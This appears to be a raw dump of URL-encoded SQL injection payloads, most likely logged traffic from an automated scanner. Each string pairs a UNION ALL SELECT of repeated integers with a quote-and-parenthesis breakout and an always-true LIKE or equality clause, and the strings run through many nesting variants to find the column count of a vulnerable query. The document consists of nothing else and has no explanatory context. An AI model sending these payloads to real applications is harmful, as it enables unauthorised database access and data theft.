-4053%27%29%29%20UNION%20ALL%20SELECT%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%2C%207592%23%20AND%20%28%28%27OucZ%27%20LIKE%20%27OucZ -9325%27%29%29%20UNION%20ALL%20SELECT%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%2C%203073%23%20AND%20%28%28%27dxBZ%27%20LIKE%20%27dxBZ -4075%27%29%29%20UNION%20ALL%20SELECT%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%2C%204782%23%20AND%20%28%28%27KjSx%27%20LIKE%20%27KjSx -5814%27%29%29%20UNION%20ALL%20SELECT%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%2C%209405%23%20AND%20%28%28%27KHLQ%27%20LIKE%20%27KHLQ -9751%27%29%29%20UNION%20ALL%20SELECT%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%23%20AND%20%28%28%27eFql%27%20LIKE%20%27eFql -3208%27%29%29%20UNION%20ALL%20SELECT%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%2C%205168%23%20AND%20%28%28%27yMHG%27%20LIKE%20%27yMHG -1129%27%29%29%20UNION%20ALL%20SELECT%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%2C%204069%23%20AND%20%28%28%27Epqt%27%20LIKE%20%27Epqt -7197%27%29%29%20UNION%20ALL%20SELECT%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%2C%209346%23%20AND%20%28%28%27OltJ%27%20LIKE%20%27OltJ -4756%27%29%29%20UNION%20ALL%20SELECT%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%23%20AND%20%28%28%27apGC%27%20LIKE%20%27apGC -1347%27%29%29%29%20UNION%20ALL%20SELECT%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%23%20AND%20%28%28%28%27haxF%27%20LIKE%20%27haxF -9824%27%29%29%29%20UNION%20ALL%20SELECT%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%23%20AND%20%28%28%28%27fkrc%27%20LIKE%20%27fkrc -4889%27%29%29%29%20UNION%20ALL%20SELECT%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%2C%207044%23%20AND%20%28%28%28%27RwVo%27%20LIKE%20%27RwVo -5522%27%29%29%29%20UNION%20ALL%20SELECT%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%23%20AND%20%28%28%28%27oPrt%27%20LIKE%20%27oPrt -3460%27%29%29%29%20UNION%20ALL%20SELECT%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%23%20AND%20%28%28%28%27odsw%27%20LIKE%20%27odsw -7973%27%29%29%29%20UNION%20ALL%20SELECT%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%2C%201477%23%20AND%20%28%28%28%27ZDkV%27%20LIKE%20%27ZDkV -4986%27%29%29%29%20UNION%20ALL%20SELECT%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%2C%206682%23%20AND%20%28%28%28%27YPka%27%20LIKE%20%27YPka -7274%27%29%29%29%20UNION%20ALL%20SELECT%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%2C%202057%23%20AND%20%28%28%28%27KpXe%27%20LIKE%20%27KpXe -6133%27%29%29%29%20UNION%20ALL%20SELECT%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%23%20AND%20%28%28%28%27Ghdy%27%20LIKE%20%27Ghdy -7526%27%29%29%29%20UNION%20ALL%20SELECT%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%2C%201405%23%20AND%20%28%28%28%27pDgd%27%20LIKE%20%27pDgd -3745%27%20UNION%20ALL%20SELECT%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%23%20AND%20%27WOZc%27%20LIKE%20%27WOZc -2628%27%20UNION%20ALL%20SELECT%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%2C%204621%23%20AND%20%27JAzU%27%20LIKE%20%27JAzU -1905%27%20UNION%20ALL%20SELECT%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%23%20AND%20%27fCwh%27%20LIKE%20%27fCwh -8560%27%20UNION%20ALL%20SELECT%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%2C%202505%23%20AND%20%27KNFf%27%20LIKE%20%27KNFf -7299%27%20UNION%20ALL%20SELECT%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%2C%209644%23%20AND%20%27QfuA%27%20LIKE%20%27QfuA -1488%27%20UNION%20ALL%20SELECT%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%2C%201799%23%20AND%20%27vMUy%27%20LIKE%20%27vMUy -5221%27%20UNION%20ALL%20SELECT%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%23%20AND%20%27npLv%27%20LIKE%20%27npLv -1756%27%20UNION%20ALL%20SELECT%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%2C%204827%23%20AND%20%27pFwc%27%20LIKE%20%27pFwc -2810%27%20UNION%20ALL%20SELECT%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%2C%205713%23%20AND%20%27DGyx%27%20LIKE%20%27DGyx -5316%27%20UNION%20ALL%20SELECT%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%23%20AND%20%27fHwZ%27%20LIKE%20%27fHwZ -6241%22%29%20UNION%20ALL%20SELECT%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%2C%201851%23%20AND%20%28%22ZhZq%22%3D%22ZhZq -4673%22%29%20UNION%20ALL%20SELECT%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%2C%208623%23%20AND%20%28%22ysiw%22%3D%22ysiw -1010%22%29%20UNION%20ALL%20SELECT%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%23%20AND%20%28%22DuQb%22%3D%22DuQb -1276%22%29%20UNION%20ALL%20SELECT%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%23%20AND%20%28%22AIlV%22%3D%22AIlV -7114%22%29%20UNION%20ALL%20SELECT%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%2C%204586%23%20AND%20%28%22kJCH%22%3D%22kJCH -2568%22%29%20UNION%20ALL%20SELECT%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%2C%208983%23%20AND%20%28%22qncB%22%3D%22qncB -4221%22%29%20UNION%20ALL%20SELECT%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%2C%209161%23%20AND%20%28%22aVEp%22%3D%22aVEp -3952%22%29%20UNION%20ALL%20SELECT%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%23%20AND%20%28%22veqX%22%3D%22veqX -2985%22%29%20UNION%20ALL%20SELECT%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%2C%207272%23%20AND%20%28%22Bfrp%22%3D%22Bfrp -3628%22%29%20UNION%20ALL%20SELECT%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%23%20AND%20%28%22kAfM%22%3D%22kAfM -3571%22%29%29%20UNION%20ALL%20SELECT%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%2C%208308%23%20AND%20%28%28%22JiOy%22%3D%22JiOy -8236%22%29%29%20UNION%20ALL%20SELECT%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%23%20AND%20%28%28%22jPhi%22%3D%22jPhi -9118%22%29%29%20UNION%20ALL%20SELECT%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%23%20AND%20%28%28%22IVlQ%22%3D%22IVlQ -4294%22%29%29%20UNION%20ALL%20SELECT%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%2C%204330%23%20AND%20%28%28%22FJwP%22%3D%22FJwP -8191%22%29%29%20UNION%20ALL%20SELECT%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%2C%206922%23%20AND%20%28%28%22WANp%22%3D%22WANp -5819%22%29%29%20UNION%20ALL%20SELECT%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%2C%206011%23%20AND%20%28%28%22SnPb%22%3D%22SnPb -2528%22%29%29%20UNION%20ALL%20SELECT%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%2C%201452%23%20AND%20%28%28%22uDvI%22%3D%22uDvI -5914%22%29%29%20UNION%20ALL%20SELECT%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%2C%205964%23%20AND%20%28%28%22OnON%22%3D%22OnON -1878%22%29%29%20UNION%20ALL%20SELECT%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%23%20AND%20%28%28%22TleG%22%3D%22TleG -5771%22%29%29%20UNION%20ALL%20SELECT%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%2C%203036%23%20AND%20%28%28%22avhC%22%3D%22avhC -6687%22%29%29%29%20UNION%20ALL%20SELECT%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%2C%204359%23%20AND%20%28%28%28%22DtQa%22%3D%22DtQa -4162%22%29%29%29%20UNION%20ALL%20SELECT%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%2C%205971%23%20AND%20%28%28%28%22qxfK%22%3D%22qxfK -6361%22%29%29%29%20UNION%20ALL%20SELECT%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%2C%206951%23%20AND%20%28%28%28%22bYjX%22%3D%22bYjX -1343%22%29%29%29%20UNION%20ALL%20SELECT%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%23%20AND%20%28%28%28%22Fndd%22%3D%22Fndd -9747%22%29%29%29%20UNION%20ALL%20SELECT%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%2C%202170%23%20AND%20%28%28%28%22JiRO%22%3D%22JiRO -6564%22%29%29%29%20UNION%20ALL%20SELECT%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%2C%201465%23%20AND%20%28%28%28%22FWyg%22%3D%22FWyg -8657%22%29%29%29%20UNION%20ALL%20SELECT%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%2C%207237%23%20AND%20%28%28%28%22gueS%22%3D%22gueS -1472%22%29%29%29%20UNION%20ALL%20SELECT%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%23%20AND%20%28%28%28%22BuJl%22%3D%22BuJl -2193%22%29%29%29%20UNION%20ALL%20SELECT%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%23%20AND%20%28%28%28%22KmOU%22%3D%22KmOU -1729%22%29%29%29%20UNION%20ALL%20SELECT%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%2C%206241%23%20AND%20%28%28%28%22EKpo%22%3D%22EKpo -5779%22%20UNION%20ALL%20SELECT%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%2C%206504%23%20AND%20%22EAgZ%22%3D%22EAgZ -5174%22%20UNION%20ALL%20SELECT%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%23%20AND%20%22msTb%22%3D%22msTb -3012%22%20UNION%20ALL%20SELECT%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%23%20AND%20%22Iegb%22%3D%22Iegb -8616%22%20UNION%20ALL%20SELECT%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%2C%209470%23%20AND%20%22Ukrl%22%3D%22Ukrl -4162%22%20UNION%20ALL%20SELECT%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%2C%203843%23%20AND%20%22rBZz%22%3D%22rBZz -2513%22%20UNION%20ALL%20SELECT%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%23%20AND%20%22HpIq%22%3D%22HpIq -1392%22%20UNION%20ALL%20SELECT%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%2C%208330%23%20AND%20%22abhg%22%3D%22abhg -6525%22%20UNION%20ALL%20SELECT%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%23%20AND%20%22lgIP%22%3D%22lgIP -7702%22%20UNION%20ALL%20SELECT%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%23%20AND%20%22UaIm%22%3D%22UaIm -7264%22%20UNION%20ALL%20SELECT%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%2C%207939%23%20AND%20%22oNrT%22%3D%22oNrT -4588%22%29%20UNION%20ALL%20SELECT%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%2C%203954%23%20AND%20%28%22pdNy%22%20LIKE%20%22pdNy -3033%22%29%20UNION%20ALL%20SELECT%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%2C%204146%23%20AND%20%28%22JXAE%22%20LIKE%20%22JXAE -7041%22%29%20UNION%20ALL%20SELECT%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%23%20AND%20%28%22wjMA%22%20LIKE%20%22wjMA -1074%22%29%20UNION%20ALL%20SELECT%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%2C%207368%23%20AND%20%28%22Pedg%22%20LIKE%20%22Pedg 